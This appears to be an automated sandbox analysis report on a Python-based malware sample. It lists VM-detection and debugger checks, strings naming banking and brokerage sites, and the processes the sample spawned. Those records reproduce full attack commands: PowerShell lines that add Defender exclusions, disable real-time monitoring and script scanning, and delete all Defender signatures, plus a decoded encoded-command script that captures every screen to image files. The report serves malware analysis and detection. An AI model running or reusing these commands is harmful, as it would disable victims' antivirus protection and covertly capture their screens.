Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765770176.00000161971E8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1766840193.0000016197572000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1457822695.000001619710E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1439779378.000001619710E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1431426826.00000161971E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: rar.exe, 00000048.00000002.1644927829.000001F5A5EEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\6
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: getmac.exe, 0000002B.00000003.1439025716.000001ABF5695000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5697000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000003.1438552704.000001ABF568F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\Linkageroute
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696497155
Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5673000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWRoot%\system32\dr+
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000003.1439025716.000001ABF5695000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5697000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000003.1438552704.000001ABF568F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmtoolsd
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B110B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7B110B1B8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B11140D0 GetProcessHeap, 0_2_00007FF7B11140D0
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B110B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7B110B1B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B10FBE20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF7B10FBE20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B10FC6AC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7B10FC6AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 0_2_00007FF7B10FC88C SetUnhandledExceptionFilter, 0_2_00007FF7B10FC88C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 2_2_00007FF8E751B970 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FF8E751B970
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 2_2_00007FF8E7553BB0 IsProcessorFeaturePresent,00007FF8F9D619C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8F9D619C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00007FF8E7553BB0
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D314C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 72_2_00007FF71D314C10
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D30A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 72_2_00007FF71D30A66C
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D30B6D8 SetUnhandledExceptionFilter, 72_2_00007FF71D30B6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Code function: 72_2_00007FF71D30B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 72_2_00007FF71D30B52C

HIPS / PFW / Operating System Protection Evasion
barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe' Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Encrypted powershell cmdline option found
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Modifies Windows Defender protection settings
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
Removes signatures from Windows Defender
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
